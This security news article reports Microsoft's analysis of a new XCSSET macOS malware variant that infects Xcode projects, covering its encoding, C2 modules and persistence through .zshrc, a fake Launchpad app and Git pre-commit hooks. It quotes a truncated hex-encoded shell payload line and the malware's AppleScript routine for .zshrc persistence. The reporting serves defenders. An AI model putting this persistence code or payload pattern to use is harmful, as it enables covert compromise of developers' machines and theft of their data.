.jpg)
%20Abstract%20Background%20112024%20SOURCE%20Amazon.jpg)
![[The AI Show Episode 142]: ChatGPT’s New Image Generator, Studio Ghibli Craze and Backlash, Gemini 2.5, OpenAI Academy, 4o Updates, Vibe Marketing & xAI Acquires X](https://www.marketingaiinstitute.com/hubfs/ep%20142%20cover.png)
![From drop-out to software architect with Jason Lengstorf [Podcast #167]](https://cdn.hashnode.com/res/hashnode/image/upload/v1743796461357/f3d19cd7-e6f5-4d7c-8bfc-eb974bc8da68.png?#)
.png?#)
_Christophe_Coat_Alamy.jpg?#)
![Rapidus in Talks With Apple as It Accelerates Toward 2nm Chip Production [Report]](https://www.iclarified.com/images/news/96937/96937/96937-640.jpg)
New XCSSET Malware Attacking macOS Users With Enhanced Obfuscation
Microsoft Threat Intelligence has discovered a new variant of XCSSET, a sophisticated modular macOS malware that infects Xcode projects and executes when developers build these projects. This is the first known XCSSET variant since 2022, featuring enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies designed to steal sensitive information from macOS users. The […] The post New XCSSET Malware Attacking macOS Users With Enhanced Obfuscation appeared first on Cyber Security News.
Microsoft Threat Intelligence has discovered a new variant of XCSSET, a sophisticated modular macOS malware that infects Xcode projects and executes when developers build these projects.
This is the first known XCSSET variant since 2022, featuring enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies designed to steal sensitive information from macOS users.
The malware’s infection strategy leverages the sharing of project files among developers working on Apple or macOS-related applications.
XCSSET’s new variant employs a modular approach with heavily encoded payloads and improved error handling.
It makes extensive use of scripting languages, UNIX commands, and legitimate binaries to maintain a low profile on affected devices and remain fileless whenever possible, making detection and removal challenging.
At the code level, the malware obfuscates module names to hinder static analysis and employs a randomized approach for generating payloads.
While previous variants relied solely on xxd (hexdump) for encoding, the latest one also incorporates Base64 encoding techniques.
The malware utilizes three distinct persistence techniques, ensuring its payload launches whenever a new shell session begins, a user opens a fake Launchpad application, or a developer commits changes in Git.
Microsoft researchers noted that the infection chain consists of four stages, beginning with an obfuscated shell payload that runs when building an infected Xcode project.
.webp)
This first-stage payload passes through multiple iterations of a hex decoder before being piped to shell:-
sh -c"(echo 33336363233343633335233303536Following initial infection, the malware downloads additional modules from its command-and-control server (C2), including components that steal system information, browser extension data, digital wallet information, and notes from the Notes application.
Persistence Techniques
The malware establishes persistence through several sophisticated methods. One approach modifies the ~/.zshrc file to execute malicious code whenever a new shell session starts.
.webp)
The malware’s zshrc persistence method first checks for a restore flag before either removing the malicious file or creating and updating it:-
on doMain()
try
if RESTORE_DEFAULT is true then
do shell script "rm -f ~/.zshrc_aliases"
log ".zshrc_aliases removed"
else
set payload to getPayloadBody("Terminal")
set payload to quoted form of payload
do shell script "echo " & payload & " > ~/.zshrc_aliases"
log ".zshrc_aliases updated"
set payload to "[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases"
set payload to quoted form of payload
do shell script "touch ~/.zshrc"
do shell script "grep -qF '.zshrc_aliases' ~/.zshrc || echo " & payload & " >> ~/.zshrc"
log ".zshrc done"
end if
on error the errorMessage
log "failed at .zshrc: " & errorMessage
return
end try
end doMainAnother persistence technique involves creating a fake Launchpad application that executes malicious code whenever a user attempts to open the legitimate Launchpad.
The malware also infects Git repositories by modifying pre-commit hooks to execute its payload whenever developers commit changes.
Microsoft recommends that users run the latest operating system versions, carefully inspect Xcode projects, and utilize security solutions like Microsoft Defender for Endpoint on Mac, which can detect and quarantine the malware variants.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
The post New XCSSET Malware Attacking macOS Users With Enhanced Obfuscation appeared first on Cyber Security News.
